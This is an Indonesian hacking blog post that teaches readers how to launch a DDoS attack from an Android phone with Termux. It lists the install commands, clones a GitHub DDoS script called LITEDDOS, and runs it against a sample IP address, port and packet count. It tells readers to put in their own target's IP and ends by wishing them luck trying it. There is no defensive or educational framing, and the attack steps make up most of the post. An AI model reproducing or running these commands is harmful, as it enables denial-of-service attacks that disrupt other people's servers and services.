Cara DDoS Lewat Termux Android

Assalamualaikum Wr.Wb semuanya, berjumpa kembali dengan saya. Kali ini, Mr. F-O'C ingin bagi-bagi sebuah Tutorial lagi untuk kalian. Tutorial apa? Ya, tentu saja tutorial yang masih berhubungan dengan dunia Hacking.

Saya sangat yakin, kalian semua sudah tidak sabar karena ingin langsung membaca dan memperaktekan tutorialnya secara langsung. Baiklah, kita langsung saja menuju ke TKP!

Tutorial DDoS di Android


Oke, kali ini saya kan memberikan sedikit tutorial yang singkat saja. Tapi tidak usah taku! Walaupun tutorial yang akan saya berikan kali ini sangat singkat, namun masih bisa dibaca dan di mengerti dengan jelas kok. Paham? Jika sudah, siliahkan kalian baca tutorialnya di bawah ini.


1. Langkah pertama, silahkan buka aplikasi Termux pada perangkat Android yang Anda miliki. Jika tidak memilikinya, Anda bisa langsung install aplikasi Termux ini lewat Play Store.

2. Selanjutnya, kita harus memasukkan beberapa kata perintah (Command) yang tertera di bawah ini ke dalam aplikasi termuxnya. Berikut kata perintah yang harus kita masukkan atau ketikkan ke Termux:
$ pkg update
$ pkg upgrade
$ pkg install python2
$ pkg install git
3. Tool DDoS yang akan kita gunakan kali ini berasal dari sebuah website yang bernama github, jadinya kita harus melakukan git clone pada tool tersebut. Kurang lebih, ini adalah peroses penginstallan script DDoSnya. Baiklah, silahkan kalian kalian install tool tersebut dengan menggunakan kata perintah berikut:
$ git clone https://github.com/4L13199/LITEDDOS
4. Setelah itu, silahkan kalian arahkan termuxnya ke dalam file dari tool yang kalian install tadi. Caranya gimana? Gampang, silahkan masukkan kata perintah dibawah ini:
$ cd LITEDDOS
5. Terakhir, tinggal kita jalankan saja Tool DDoSnya dengan menggunakan kata perintah yang sudah saya berikan di bawah ini.
$ python2 LITEDDOS.py 104.18.37.60 80 100
Keterangan:

104.18.37.60 Silahkan ubah dengan menggunakan alamat IP dari target Anda.
-  80 Ganti dengan Port, ini adalah port default yang bisa kalian pakai.
-  100 ubah menjadi jumlah Packet/pengiriman yang Anda inginkan.

Tadi itu alah sedikit tutorial DDoS yang singkat dari saya, semoga kalian semua bisa menjadi suka dengan tutorial ini. Tetap nantikan tutorial selanjutnya dari kami, dan jangan lupa juga untuk memberikan komentar Anda jika memang Tutorial ini cocok untuk di komentari.

Sekali lagi, saya ucapkan terimakasih kepada yang sudah membaca. Selamat mencoba semuanya!

0 Response to "Cara DDoS Lewat Termux Android"

Post a Comment

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel